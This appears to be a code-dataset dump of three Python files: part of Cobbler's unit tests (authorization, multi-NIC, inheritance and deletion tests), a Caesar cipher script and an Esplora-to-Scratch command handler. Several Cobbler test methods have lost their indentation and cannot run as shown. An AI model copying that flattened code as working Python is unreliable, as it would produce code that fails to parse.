        # who can edit all objects that depend on the said kickstart
        # in this test, superlab & basement1 can edit test_profile0
        # superlab & basement1/3 can edit test_system0
        # the systems share a common kickstart record (in this case
        # explicitly set, which is a bit arbitrary as they are parent/child
        # nodes, but the concept is not limited to this).
        # Therefore the correct result is that the following users can edit:
        #    admin1, superlab1, superlab2
        # And these folks can't
        #    basement1, basement2
        # Basement2 is rejected because the kickstart is shared by something
        # basmeent2 can not edit.
        for user in [ "admin1", "superlab1", "superlab2", "basement1" ]:
            self.assertTrue(1==authorize(self.api, user, "modify_kickstart", "/tmp/test_cobbler_kickstart"), "%s can modify_kickstart" % user)
        for user in [ "basement2", "dne" ]:
            # message fixed: these users must NOT be able to modify
            self.assertTrue(0==authorize(self.api, user, "modify_kickstart", "/tmp/test_cobbler_kickstart"), "%s cannot modify_kickstart" % user)
        # ensure admin1 can edit (he's an admin) and do other tasks
        # same applies to basement1 who is explicitly added as a user
        # and superlab1 who is in a group in the ownership list
        for user in ["admin1","superlab1","basement1"]:
            self.assertTrue(1==authorize(self.api, user, "save_distro", xo),"%s can save_distro" % user)
            self.assertTrue(1==authorize(self.api, user, "modify_distro", xo),"%s can modify_distro" % user)
            self.assertTrue(1==authorize(self.api, user, "copy_distro", xo),"%s can copy_distro" % user)
            self.assertTrue(1==authorize(self.api, user, "remove_distro", xn),"%s can remove_distro" % user)
        # ensure all users in the file can sync
        for user in [ "admin1", "superlab1", "basement1", "basement2" ]:
            self.assertTrue(1==authorize(self.api, user, "sync"))
        # make sure basement2 can't edit (not in group)
        # and same goes for "dne" (does not exist in users.conf)
        for user in [ "basement2", "dne" ]:
            self.assertTrue(0==authorize(self.api, user, "save_distro", xo), "user %s cannot save_distro" % user)
            self.assertTrue(0==authorize(self.api, user, "modify_distro", xo), "user %s cannot modify_distro" % user)
            self.assertTrue(0==authorize(self.api, user, "remove_distro", xn), "user %s cannot remove_distro" % user)
        # basement2 is in the file so he can still copy
        self.assertTrue(1==authorize(self.api, "basement2", "copy_distro", xo), "basement2 can copy_distro")
        # dne can not copy or sync either (not in the users.conf)
        self.assertTrue(0==authorize(self.api, "dne", "copy_distro", xo), "dne cannot copy_distro")
        self.assertTrue(0==authorize(self.api, "dne", "sync"), "dne cannot sync")
        # unlike the distro testdistro0, testrepo0 is unowned
        # so any user in the file will be able to edit it.
        for user in [ "admin1", "superlab1", "basement1", "basement2" ]:
            self.assertTrue(1==authorize(self.api, user, "save_repo", ro), "user %s can save_repo" % user)
        # though dne is still not listed and will be denied
        self.assertTrue(0==authorize(self.api, "dne", "save_repo", ro), "dne cannot save_repo")
        # if we survive, restore the users file as module testing is done.
        # BUG FIX: the original copied users.conf over the backup (wrong
        # direction), destroying the backup instead of restoring the file.
        if os.path.exists("/tmp/cobbler_ubak"):
            shutil.copyfile("/tmp/cobbler_ubak","/etc/cobbler/users.conf")
class MultiNIC(BootTest):
    """Per-interface (multi-NIC) attribute handling on system objects."""
    def test_multi_nic_support(self):
        """Spread per-NIC fields across six interfaces (intf0..intf5)
        and check both the search API and the stored interface hash."""
        system = self.api.new_system()
        self.assertTrue(system.set_name("nictest"))
        self.assertTrue(system.set_profile("testprofile0"))
        self.assertTrue(system.set_hostname("zero","intf0"))
        self.assertTrue(system.set_mac_address("EE:FF:DD:CC:DD:CC","intf1"))
        self.assertTrue(system.set_ip_address("127.0.0.5","intf2"))
        self.assertTrue(system.set_dhcp_tag("zero","intf3"))
        self.assertTrue(system.set_virt_bridge("zero","intf4"))
        self.assertTrue(system.set_gateway("192.168.1.25","intf4"))
        self.assertTrue(system.set_mac_address("AA:AA:BB:BB:CC:CC","intf4"))
        self.assertTrue(system.set_hostname("fooserver","intf4"))
        self.assertTrue(system.set_dhcp_tag("red","intf4"))
        self.assertTrue(system.set_ip_address("192.168.1.26","intf4"))
        self.assertTrue(system.set_subnet("255.255.255.0","intf4"))
        self.assertTrue(system.set_dhcp_tag("tag2","intf5"))
        self.assertTrue(self.api.systems().add(system))
        # mixing in some higher level API calls with some lower level internal stuff
        # just to make sure it's all good.
        self.assertTrue(self.api.find_system(hostname="zero"))
        self.assertTrue(self.api.systems().find(mac_address="EE:FF:DD:CC:DD:CC"))
        self.assertTrue(self.api.systems().find(ip_address="127.0.0.5"))
        self.assertTrue(self.api.find_system(virt_bridge="zero"))
        self.assertTrue(self.api.systems().find(gateway="192.168.1.25"))
        self.assertTrue(self.api.systems().find(subnet="255.255.255.0"))
        self.assertTrue(self.api.find_system(dhcp_tag="tag2"))
        self.assertTrue(self.api.systems().find(dhcp_tag="zero"))
        # verify that the system has exactly 6 interfaces (intf0..intf5).
        # NOTE: the original comment said "exactly 5", contradicting the
        # assertion and the six interface names used above.
        self.assertTrue(len(system.interfaces.keys()) == 6)
        # now check one interface to make sure it's exactly right
        # and we didn't accidentally fill in any other fields elsewhere
        self.assertTrue(system.interfaces.has_key("intf4"))
        for (name,intf) in system.interfaces.iteritems():
            if name == "intf4": # xmlrpc dicts must have string keys, so we must also
                self.assertTrue(intf["gateway"] == "192.168.1.25")
                self.assertTrue(intf["virt_bridge"] == "zero")
                self.assertTrue(intf["subnet"] == "255.255.255.0")
                self.assertTrue(intf["mac_address"] == "AA:AA:BB:BB:CC:CC")
                self.assertTrue(intf["ip_address"] == "192.168.1.26")
                self.assertTrue(intf["hostname"] == "fooserver")
                self.assertTrue(intf["dhcp_tag"] == "red")
class Utilities(BootTest):
def _expeq(self, expected, actual):
try:
self.failUnlessEqual(expected, actual,
"Expected: %s; actual: %s" % (expected, actual))
except:
self.fail("exception during failUnlessEqual")
    def test_kernel_scan(self):
        """find_kernel: accepts an exact path, rejects a missing one,
        and locates the fake kernel when handed a directory to scan."""
        self.assertTrue(utils.find_kernel(self.fk_kernel))
        self.assertFalse(utils.find_kernel("filedoesnotexist"))
        self._expeq(self.fk_kernel, utils.find_kernel(self.topdir))
    def test_initrd_scan(self):
        """find_initrd: accepts an exact path, rejects a missing one,
        and locates the fake initrd when handed a directory to scan."""
        self.assertTrue(utils.find_initrd(self.fk_initrd))
        self.assertFalse(utils.find_initrd("filedoesnotexist"))
        self._expeq(self.fk_initrd, utils.find_initrd(self.topdir))
def test_kickstart_scan(self):
# we don't check to see if kickstart files look like anything
# so this will pass
self.assertTrue(utils.find_kickstart("filedoesnotexist") is None)
self.assertTrue(utils.find_kickstart(self.topdir) == None)
self.assertTrue(utils.find_kickstart("http://bar"))
self.assertTrue(utils.find_kickstart("ftp://bar"))
self.assertTrue(utils.find_kickstart("nfs://bar"))
self.assertFalse(utils.find_kickstart("gopher://bar"))
def test_matching(self):
self.assertTrue(utils.is_mac("00:C0:B7:7E:55:50"))
self.assertTrue(utils.is_mac("00:c0:b7:7E:55:50"))
self.assertFalse(utils.is_mac("00.D0.B7.7E.55.50"))
self.assertFalse(utils.is_mac("drwily.rdu.redhat.com"))
self.assertTrue(utils.is_ip("127.0.0.1"))
self.assertTrue(utils.is_ip("192.168.1.1"))
self.assertFalse(utils.is_ip("00:C0:B7:7E:55:50"))
self.assertFalse(utils.is_ip("drwily.rdu.redhat.com"))
    def test_some_random_find_commands(self):
        """Exercise the collection find() API: bad field names raise,
        bad values return None, and list/keyword/positional forms work."""
        # initial setup...
        self.test_system_name_is_a_MAC()
        # search for a parameter that isn't real, want an error
        self.failUnlessRaises(CobblerException,self.api.systems().find, pond="mcelligots")
        # verify that even though we have several different NICs search still works
        self.assertTrue(self.api.systems().find(name="nictest"))
        # search for a parameter with a bad value, want None
        self.assertFalse(self.api.systems().find(name="horton"))
        # one valid parameter another invalid is still an error
        self.failUnlessRaises(CobblerException,self.api.systems().find, name="onefish",pond="mcelligots")
        # searching with no args is ALSO an error
        self.failUnlessRaises(CobblerException, self.api.systems().find)
        # searching for a list returns a list of correct length
        self.assertTrue(len(self.api.systems().find(mac_address="00:16:41:14:B7:71",return_list=True))==1)
        # make sure we can still search without an explicit keyword arg
        self.assertTrue(len(self.api.systems().find("00:16:41:14:B7:71",return_list=True))==1)
        self.assertTrue(self.api.systems().find("00:16:41:14:B7:71"))
    def test_invalid_distro_non_referenced_kernel(self):
        """A distro with a nonexistent kernel path cannot be saved."""
        distro = self.api.new_distro()
        self.assertTrue(distro.set_name("testdistro2"))
        # set_kernel itself rejects the bad path ...
        self.failUnlessRaises(CobblerException,distro.set_kernel,"filedoesntexist")
        self.assertTrue(distro.set_initrd(self.fk_initrd))
        # ... and the add fails too since the kernel was never set
        self.failUnlessRaises(CobblerException, self.api.distros().add, distro)
        self.assertFalse(self.api.distros().find(name="testdistro2"))
    def test_invalid_distro_non_referenced_initrd(self):
        """A distro with a nonexistent initrd path cannot be saved."""
        distro = self.api.new_distro()
        self.assertTrue(distro.set_name("testdistro3"))
        self.assertTrue(distro.set_kernel(self.fk_kernel))
        # set_initrd rejects the bad path, and the add fails as well
        self.failUnlessRaises(CobblerException, distro.set_initrd, "filedoesntexist")
        self.failUnlessRaises(CobblerException, self.api.distros().add, distro)
        self.assertFalse(self.api.distros().find(name="testdistro3"))
def test_invalid_profile_non_referenced_distro(self):
profile = self.api.new_profile()
self.assertTrue(profile.set_name("testprofile11"))
self.failUnlessRaises(CobblerException, profile.set_distro, "distrodoesntexist")
self.assertTrue(profile.set_kickstart(FAKE_KICKSTART))
self.failUnlessRaises(CobblerException, self.api.profiles().add, profile)
self.assertFalse(self.api.profiles().find(name="testprofile2"))
    def test_invalid_profile_kickstart_not_url(self):
        """A bad kickstart path is rejected by set_kickstart, but the
        profile can still be added since kickstarts are optional."""
        profile = self.api.new_profile()
        self.assertTrue(profile.set_name("testprofile12"))
        self.assertTrue(profile.set_distro("testdistro0"))
        self.failUnlessRaises(CobblerException, profile.set_kickstart, "kickstartdoesntexist")
        # since kickstarts are optional, you can still add it
        self.assertTrue(self.api.profiles().add(profile))
        self.assertTrue(self.api.profiles().find(name="testprofile12"))
        # now verify the other kickstart forms would still work
        self.assertTrue(profile.set_kickstart("http://bar"))
        self.assertTrue(profile.set_kickstart("ftp://bar"))
        self.assertTrue(profile.set_kickstart("nfs://bar"))
    def test_profile_virt_parameter_checking(self):
        """Virt parameters: file size and CPU count must parse as
        integers; non-integer strings are rejected."""
        profile = self.api.new_profile()
        self.assertTrue(profile.set_name("testprofile12b"))
        self.assertTrue(profile.set_distro("testdistro0"))
        self.assertTrue(profile.set_kickstart("http://127.0.0.1/foo"))
        self.assertTrue(profile.set_virt_bridge("xenbr1"))
        # sizes must be integers
        self.assertTrue(profile.set_virt_file_size("54321"))
        self.failUnlessRaises(Exception, profile.set_virt_file_size, "huge")
        self.failUnlessRaises(Exception, profile.set_virt_file_size, "54.321")
        # cpus must be integers
        self.assertTrue(profile.set_virt_cpus("2"))
        self.failUnlessRaises(Exception, profile.set_virt_cpus, "3.14")
        self.failUnlessRaises(Exception, profile.set_virt_cpus, "6.02*10^23")
        self.assertTrue(self.api.profiles().add(profile))
def test_inheritance_and_variable_propogation(self):
# STEP ONE: verify that non-inherited objects behave
# correctly with ks_meta (we picked this attribute
# because it's a hash and it's a bit harder to handle
# than strings). It should be passed down the render
# tree to all subnodes
repo = self.api.new_repo()
try:
os.makedirs("/tmp/test_cobbler_repo")
except:
pass
fd = open("/tmp/test_cobbler_repo/test.file", "w+")
fd.write("hello!")
fd.close()
self.assertTrue(repo.set_name("testrepo"))
self.assertTrue(repo.set_mirror("/tmp/test_cobbler_repo"))
self.assertTrue(self.api.repos().add(repo))
profile = self.api.new_profile()
self.assertTrue(profile.set_name("testprofile12b2"))
self.assertTrue(profile.set_distro("testdistro0"))
self.assertTrue(profile.set_kickstart("http://127.0.0.1/foo"))
self.assertTrue(profile.set_repos(["testrepo"]))
self.assertTrue(self.api.profiles().add(profile))
self.api.reposync()
self.api.sync()
system = self.api.new_system()
self.assertTrue(system.set_name("foo"))
self.assertTrue(system.set_profile("testprofile12b2"))
self.assertTrue(system.set_ksmeta({"asdf" : "jkl" }))
self.assertTrue(self.api.systems().add(system))
profile = self.api.profiles().find("testprofile12b2")
ksmeta = profile.ks_meta
self.assertFalse(ksmeta.has_key("asdf"))
# FIXME: do the same for inherited profiles
# now verify the same for an inherited profile
# and this time walk up the tree to verify it wasn't
# applied to any other object except the base.
profile2 = self.api.new_profile(is_subobject=True)
profile2.set_name("testprofile12b3")
profile2.set_parent("testprofile12b2")
self.assertTrue(self.api.profiles().add(profile2))
self.api.reposync()
self.api.sync()
# FIXME: now add a system to the inherited profile
# and set a attribute on it that we will later check for
system2 = self.api.new_system()
self.assertTrue(system2.set_name("foo2"))
self.assertTrue(system2.set_profile("testprofile12b3"))
self.assertTrue(system2.set_ksmeta({"narf" : "troz"}))
self.assertTrue(self.api.systems().add(system2))
self.api.reposync()
self.api.sync()
# FIXME: now evaluate the system object and make sure
# that it has inherited the repos value from the superprofile
# above it's actual profile. This should NOT be present in the
# actual object, which we have not modified yet.
data = utils.blender(self.api, False, system2)
self.assertTrue(data["repos"] == ["testrepo"])
self.assertTrue(self.api.profiles().find(system2.profile).repos == "<<inherit>>")
# now if we set the repos object of the system to an additional
# repo we should verify it now contains two repos.
# (FIXME)
repo2 = self.api.new_repo()
try:
os.makedirs("/tmp/cobbler_test_repo")
except:
pass
fd = open("/tmp/cobbler_test_repo/file.test","w+")
fd.write("Hi!")
fd.close()
self.assertTrue(repo2.set_name("testrepo2"))
self.assertTrue(repo2.set_mirror("/tmp/cobbler_test_repo"))
self.assertTrue(self.api.repos().add(repo2))
profile2 = self.api.profiles().find("testprofile12b3")
# note: side check to make sure we can also set to string values
profile2.set_repos("testrepo2")
self.api.profiles().add(profile2) # save it
# random bug testing: run sync several times and ensure cardinality doesn't change
self.api.reposync()
self.api.sync()
self.api.sync()
self.api.sync()
data = utils.blender(self.api, False, system2)
self.assertTrue("testrepo" in data["repos"])
self.assertTrue("testrepo2" in data["repos"])
self.assertTrue(len(data["repos"]) == 2)
self.assertTrue(self.api.profiles().find(system2.profile).repos == ["testrepo2"])
# now double check that the parent profile still only has one repo in it.
# this is part of our test against upward propogation
profile = self.api.profiles().find("testprofile12b2")
self.assertTrue(len(profile.repos) == 1)
self.assertTrue(profile.repos == ["testrepo"])
# now see if the subprofile does NOT have the ksmeta attribute
# this is part of our test against upward propogation
profile2 = self.api.profiles().find("testprofile12b3")
self.assertTrue(type(profile2.ks_meta) == type(""))
self.assertTrue(profile2.ks_meta == "<<inherit>>")
# now see if the profile above this profile still doesn't have it
profile = self.api.profiles().find("testprofile12b2")
self.assertTrue(type(profile.ks_meta) == type({}))
self.api.reposync()
self.api.sync()
self.assertFalse(profile.ks_meta.has_key("narf"), "profile does not have the system ksmeta")
self.api.reposync()
self.api.sync()
# verify that the distro did not acquire the property
# we just set on the leaf system
distro = self.api.distros().find("testdistro0")
self.assertTrue(type(distro.ks_meta) == type({}))
self.assertFalse(distro.ks_meta.has_key("narf"), "distro does not have the system ksmeta")
# STEP THREE: verify that inheritance appears to work
# by setting ks_meta on the subprofile and seeing
# if it appears on the leaf system ... must use
# blender functions
profile2 = self.api.profiles().find("testprofile12b3")
profile2.set_ksmeta({"canyouseethis" : "yes" })
self.assertTrue(self.api.profiles().add(profile2))
system2 = self.api.systems().find("foo2")
data = utils.blender(self.api, False, system2)
self.assertTrue(data.has_key("ks_meta"))
self.assertTrue(data["ks_meta"].has_key("canyouseethis"))
# STEP FOUR: do the same on the superprofile and see
# if that propogates
profile = self.api.profiles().find("testprofile12b2")
profile.set_ksmeta({"canyouseethisalso" : "yes" })
self.assertTrue(self.api.profiles().add(profile))
system2 = self.api.systems().find("foo2")
data = utils.blender(self.api, False, system2)
self.assertTrue(data.has_key("ks_meta"))
self.assertTrue(data["ks_meta"].has_key("canyouseethisalso"))
# STEP FIVE: see if distro attributes propogate
distro = self.api.distros().find("testdistro0")
distro.set_ksmeta({"alsoalsowik" : "moose" })
self.assertTrue(self.api.distros().add(distro))
system2 = self.api.systems().find("foo2")
data = utils.blender(self.api, False, system2)
self.assertTrue(data.has_key("ks_meta"))
self.assertTrue(data["ks_meta"].has_key("alsoalsowik"))
# STEP SEVEN: see if settings changes also propogate
# TBA
    def test_system_name_is_a_MAC(self):
        """A system named with a MAC address is findable both by name and
        by mac_address; a bogus MAC never matches.
        """
        system = self.api.new_system()
        name = "00:16:41:14:B7:71"
        self.assertTrue(system.set_name(name))
        self.assertTrue(system.set_profile("testprofile0"))
        self.assertTrue(self.api.systems().add(system))
        self.assertTrue(self.api.systems().find(name=name))
        self.assertTrue(self.api.systems().find(mac_address="00:16:41:14:B7:71"))
        self.assertFalse(self.api.systems().find(mac_address="thisisnotamac"))
    def test_system_name_is_an_IP(self):
        """A system may also be named with an IP address."""
        system = self.api.new_system()
        name = "192.168.1.54"
        self.assertTrue(system.set_name(name))
        self.assertTrue(system.set_profile("testprofile0"))
        self.assertTrue(self.api.systems().add(system))
        self.assertTrue(self.api.systems().find(name=name))
    def test_invalid_system_non_referenced_profile(self):
        """A system may not reference a profile that does not exist."""
        system = self.api.new_system()
        self.assertTrue(system.set_name("drwily.rdu.redhat.com"))
        self.failUnlessRaises(CobblerException, system.set_profile, "profiledoesntexist")
        self.failUnlessRaises(CobblerException, self.api.systems().add, system)
class SyncContents(BootTest):
    """Tests for the on-disk results of a sync in the tftpboot tree."""
    def test_blender_cache_works(self):
        """System-specific PXE data must survive a sync (regression test
        for a 0.6.3 bug where profile data overwrote system data).
        """
        # this is just a file that exists that we don't have to create
        fake_file = "/etc/hosts"
        distro = self.api.new_distro()
        self.assertTrue(distro.set_name("D1"))
        self.assertTrue(distro.set_kernel(fake_file))
        self.assertTrue(distro.set_initrd(fake_file))
        self.assertTrue(self.api.distros().add(distro, with_copy=True))
        self.assertTrue(self.api.distros().find(name="D1"))
        profile = self.api.new_profile()
        self.assertTrue(profile.set_name("P1"))
        self.assertTrue(profile.set_distro("D1"))
        self.assertTrue(profile.set_kickstart(fake_file))
        self.assertTrue(self.api.profiles().add(profile, with_copy=True))
        self.assertTrue(self.api.profiles().find(name="P1"))
        system = self.api.new_system()
        self.assertTrue(system.set_name("S1"))
        self.assertTrue(system.set_mac_address("BB:EE:EE:EE:EE:FF","intf0"))
        self.assertTrue(system.set_profile("P1"))
        self.assertTrue(self.api.systems().add(system, with_copy=True))
        self.assertTrue(self.api.systems().find(name="S1"))
        # ensure that the system after being added has the right template data
        # in /tftpboot
        # PXE config filename is "01-" + the MAC, lowercased, dash-separated.
        converted="01-bb-ee-ee-ee-ee-ff"
        # tftpboot root differs by distribution; try both known locations.
        if os.path.exists("/var/lib/tftpboot"):
            fh = open("/var/lib/tftpboot/pxelinux.cfg/%s" % converted)
        else:
            fh = open("/tftpboot/pxelinux.cfg/%s" % converted)
        data = fh.read()
        self.assertTrue(data.find("/op/ks/") != -1)
        fh.close()
        # ensure that after sync is applied, the blender cache still allows
        # the system data to persist over the profile data in /tftpboot
        # (which was an error we had in 0.6.3)
        self.api.sync()
        if os.path.exists("/var/lib/tftpboot"):
            fh = open("/var/lib/tftpboot/pxelinux.cfg/%s" % converted)
        else:
            fh = open("/tftpboot/pxelinux.cfg/%s" % converted)
        data = fh.read()
        self.assertTrue(data.find("/op/ks/") != -1)
        fh.close()
class Deletions(BootTest):
    """Deletion rules: missing objects raise, referenced objects may not be
    removed (no orphans), and deletes in leaf-to-root order succeed.
    """
    def test_invalid_delete_profile_doesnt_exist(self):
        self.failUnlessRaises(CobblerException, self.api.profiles().remove, "doesnotexist")
    def test_invalid_delete_profile_would_orphan_systems(self):
        # a profile still referenced by a system must not be deletable
        self.make_basic_config()
        self.failUnlessRaises(CobblerException, self.api.profiles().remove, "testprofile0")
    def test_invalid_delete_system_doesnt_exist(self):
        self.failUnlessRaises(CobblerException, self.api.systems().remove, "doesnotexist")
    def test_invalid_delete_distro_doesnt_exist(self):
        self.failUnlessRaises(CobblerException, self.api.distros().remove, "doesnotexist")
    def test_invalid_delete_distro_would_orphan_profile(self):
        # a distro still referenced by a profile must not be deletable
        self.make_basic_config()
        self.failUnlessRaises(CobblerException, self.api.distros().remove, "testdistro0")
    def test_working_deletes(self):
        # deleting system, then profile, then distro (leaf to root) works
        self.api.clear()
        self.make_basic_config()
        self.assertTrue(self.api.systems().remove("drwily.rdu.redhat.com"))
        self.api.serialize()
        self.assertTrue(self.api.profiles().remove("testprofile0"))
        self.assertTrue(self.api.distros().remove("testdistro0"))
        self.assertFalse(self.api.systems().find(name="drwily.rdu.redhat.com"))
        self.assertFalse(self.api.profiles().find(name="testprofile0"))
        self.assertFalse(self.api.distros().find(name="testdistro0"))
class TestCheck(BootTest):
    """Smoke test for the configuration checker."""
    def test_check(self):
        # we can't know if it's supposed to fail in advance
        # (ain't that the halting problem), but it shouldn't ever
        # throw exceptions.
        self.api.check()
class TestSync(BootTest):
    """Placeholder: a real sync would clobber a live cobbler setup."""
    def test_real_run(self):
        # syncing a real test run in an automated environment would
        # break a valid cobbler configuration, so we're not going to
        # test this here.
        pass
class TestListings(BootTest):
    """Coverage-oriented checks that printable listings are non-empty."""
    def test_listings(self):
        # check to see if the collection listings output something.
        # this is a minimal check, mainly for coverage, not validity
        self.make_basic_config()
        self.assertTrue(len(self.api.systems().printable()) > 0)
        self.assertTrue(len(self.api.profiles().printable()) > 0)
        self.assertTrue(len(self.api.distros().printable()) > 0)
#class TestCLIBasic(BootTest):
#
# def test_cli(self):
# # just invoke the CLI to increase coverage and ensure
# # nothing major is broke at top level. Full CLI command testing
# # is not included (yet) since the API tests hit that fairly throughly
# # and it would easily double the length of the tests.
# app = "/usr/bin/python"
# self.assertTrue(subprocess.call([app,"cobbler/cobbler.py","list"]) == 0)
if __name__ == "__main__":
    # Must be run from the project root so "tests" is importable and
    # relative fixture paths resolve.  (Python 2 print statement.)
    if not os.path.exists("setup.py"):
        print "tests: must invoke from top level directory"
        sys.exit(1)
    loader = unittest.defaultTestLoader
    test_module = __import__("tests") # self import considered harmful?
    tests = loader.loadTestsFromModule(test_module)
    runner = unittest.TextTestRunner()
    runner.run(tests)
    sys.exit(0)
| brenton/cobbler | tests/tests.py | Python | gpl-2.0 | 37,355 |
# Caesar Cipher
# Alphabet the cipher shifts within; characters not in SYMBOLS pass
# through unchanged.  Upper- and lower-case occupy distinct positions,
# so a shift may change a letter's case.
SYMBOLS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
# Largest legal key: one full rotation of the symbol set.
MAX_KEY_SIZE = len(SYMBOLS)
def getMode():
    """Prompt until the user picks a mode; return it lowercased.

    Accepted answers are 'encrypt', 'e', 'decrypt', or 'd'.
    """
    accepted = ('encrypt', 'e', 'decrypt', 'd')
    while True:
        print('Do you wish to encrypt or decrypt a message?')
        answer = input().lower()
        if answer not in accepted:
            print('Enter either "encrypt" or "e" or "decrypt" or "d".')
            continue
        return answer
def getMessage():
    """Prompt for and return the message to be encrypted or decrypted."""
    print('Enter your message:')
    return input()
def getKey():
    """Prompt until the user enters a valid key.

    Returns:
        int: a key in the inclusive range 1..MAX_KEY_SIZE.
    """
    while True:
        print('Enter the key number (1-%s)' % (MAX_KEY_SIZE))
        try:
            key = int(input())
        except ValueError:
            # BUG FIX: non-numeric input used to raise an unhandled
            # ValueError and crash the program; re-prompt instead.
            continue
        if 1 <= key <= MAX_KEY_SIZE:
            return key
def getTranslatedMessage(mode, message, key):
    """Shift each SYMBOLS character of *message* by *key* positions.

    Args:
        mode: 'encrypt'/'e' shifts forward; anything starting with 'd'
            shifts backward.
        message: text to translate; characters outside SYMBOLS are
            copied through unchanged.
        key: integer shift amount.

    Returns:
        The translated string.
    """
    if mode[0] == 'd':
        key = -key
    translated = ''
    for symbol in message:
        symbolIndex = SYMBOLS.find(symbol)
        if symbolIndex == -1: # Symbol not found in SYMBOLS.
            # Just add this symbol without any change.
            translated += symbol
        else:
            # Modular arithmetic wraps in both directions, and — unlike
            # the previous single add/subtract adjustment — also handles
            # keys larger than len(SYMBOLS) instead of raising IndexError.
            # Results are identical for the documented 1..MAX_KEY_SIZE range.
            translated += SYMBOLS[(symbolIndex + key) % len(SYMBOLS)]
    return translated
def main():
    """Run one interactive encrypt/decrypt session."""
    mode = getMode()
    message = getMessage()
    key = getKey()
    print('Your translated text is:')
    print(getTranslatedMessage(mode, message, key))


# Guarding the entry point keeps "import cipher" side-effect free while
# leaving script execution behavior unchanged.
if __name__ == '__main__':
    main()
| triplefox/2017STDIOGameJam | asweigart/caesar_cipher/cipher.py | Python | mit | 1,452 |
# -*- coding: utf-8 -*-
"""
Created on Feb 14 13:17:15 2015
@author: Alan Yorinks
Copyright (c) 2015 Alan Yorinks All right reserved.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; either
version 3 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import logging
import datetime
from collections import deque
from esp4s_serial import EspSerial
import esp4s_http_server
class Esp4sCommandHandlers:
    """
    This class processes any command received from Scratch 2.0
    If commands need to be added in the future, a command handler method is
    added to this file and the command_dict at the end of this file is
    updated to contain the method. Command names must be the same in the json .s2e Scratch
    descriptor file.
    """
    # class variables
    # NOTE(review): these are mutable CLASS-level attributes shared by all
    # instances; several are shadowed by instance attributes in __init__,
    # but report/snap_report/scratch_report are mutated via self — confirm
    # that only one instance of this class ever exists.
    port_id = ""
    baud_rate = 57600
    timeout = 1
    esplora = None
    report = []
    snap_report = {}
    scratch_report = []
    def __init__(self, com_port):
        """
        Instantiate the command handler
        :param com_port: Communications port for esplora communication
        :return: None
        """
        self.com_port = com_port
        self.first_poll_received = False
        self.first_command_received = False
        # deque is shared with the serial receive thread (thread-safe for
        # append/popleft).
        self.command_deque = deque()
        self.debug = 0
        # open the serial interface and start the receive thread
        self.esplora = EspSerial(com_port, self.command_deque)
        self.esplora.open()
        self.esplora.start()
    def start_http_server(self):
        """
        Start up the HTTP server
        :return: None
        """
        esp4s_http_server.start_server(self)
    def do_command(self, command):
        """
        This method looks up the command that resides in element zero of the command list
        within the command dictionary and executes the method for the command.
        Each command returns string that will be eventually be sent to Scratch
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        if not self.first_command_received:
            # start the sensor data flowing
            self.esplora.write("C")
            self.first_command_received = True
        # NOTE(review): an unrecognized command name makes .get() return
        # None and execute_command will raise TypeError — confirm intended.
        method = self.command_dict.get(command[0])
        if command[0] != "poll":
            # turn on debug logging if requested
            if self.debug == 'On':
                debug_string = "DEBUG: "
                debug_string += str(datetime.datetime.now())
                debug_string += ": "
                for data in command:
                    debug_string += "".join(map(str, data))
                    debug_string += ' '
                logging.debug(debug_string)
                print (debug_string)
        rval = self.execute_command(method, command)
        return rval
    def execute_command(self, method, command):
        """
        Look up the command in command table and return it's method.
        :param method: The method to execute
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        # command_dict stores plain functions, so self is passed explicitly.
        return method(self, command)
    def orientation(self, command):
        """
        Set the orientation of the esplora
        :param command:
        :return:"okay"
        """
        self.esplora.set_orientation(command[1])
        return 'okay'
    def temp_units(self, command):
        """
        Set the temperature units
        :param command:
        :return:"okay"
        """
        self.esplora.set_temp_units(command[1])
        return 'okay'
    # noinspection PyUnusedLocal
    def poll(self, command):
        """
        This method scans the data tables and assembles data for all reporter
        blocks and returns the data to the caller.
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        if not self.first_poll_received:
            logging.info('Scratch detected! Ready to rock and roll...')
            print ('Scratch detected! Ready to rock and roll...')
            self.first_poll_received = True
        # retrieve sensor status from the esplora
        responses = ''
        if self.pop_status():
            responses = ''.join(self.scratch_report)
            if responses == '':
                responses = 'okay'
            return responses
        else:
            return 'okay'
    def pop_status(self):
        """
        Get the latest status from the deque
        :return: True if status is available, False if it is not
        """
        # drain the deque, keeping only the most recent report
        while len(self.command_deque) != 0:
            self.report = self.command_deque.popleft()
        if len(self.report) != 0:
            # report is a pair: [scratch-format, snap-format]
            self.scratch_report = self.report[0]
            self.snap_report = self.report[1]
            return True
        else:
            return False
    # noinspection PyUnusedLocal
    def send_cross_domain_policy(self, command):
        """
        This method returns cross domain policy back to Scratch upon request.
        It keeps Flash happy. It is here as a place holder if Scratch allows
        the HTTP extensions to be used on the on-line version
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        policy = "<cross-domain-policy>\n"
        policy += "  <allow-access-from domain=\"*\" to-ports=\""
        policy += str(self.com_port)
        policy += "\"/>\n"
        policy += "</cross-domain-policy>\n\0"
        return policy
    # noinspection PyMethodMayBeStatic,PyUnusedLocal
    def reset_esplora(self, command):
        """
        Kill tone
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        # "T0" = tone with frequency 0, i.e. silence
        self.esplora.write("T0")
        return "okay"
    # noinspection PyMethodMayBeStatic
    def set_board_led(self, command):
        """
        This method control the D13 board LED
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        if command[1] == 'On':
            self.esplora.write("L 1")
        else:
            self.esplora.write("L 0")
        return 'okay'
    # normal esp4s_http return for commands
    # noinspection PyMethodMayBeStatic
    def set_leds(self, command):
        """
        This method controls the RGB LEDs
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        command_string = None
        if command[1] == "Red":
            command_string = "R"
        elif command[1] == "Green":
            command_string = "G"
        elif command[1] == "Blue":
            command_string = "B"
        # unknown colors are silently ignored
        if command_string is not None:
            command_string += command[2]
            self.esplora.write(command_string)
        return 'okay'
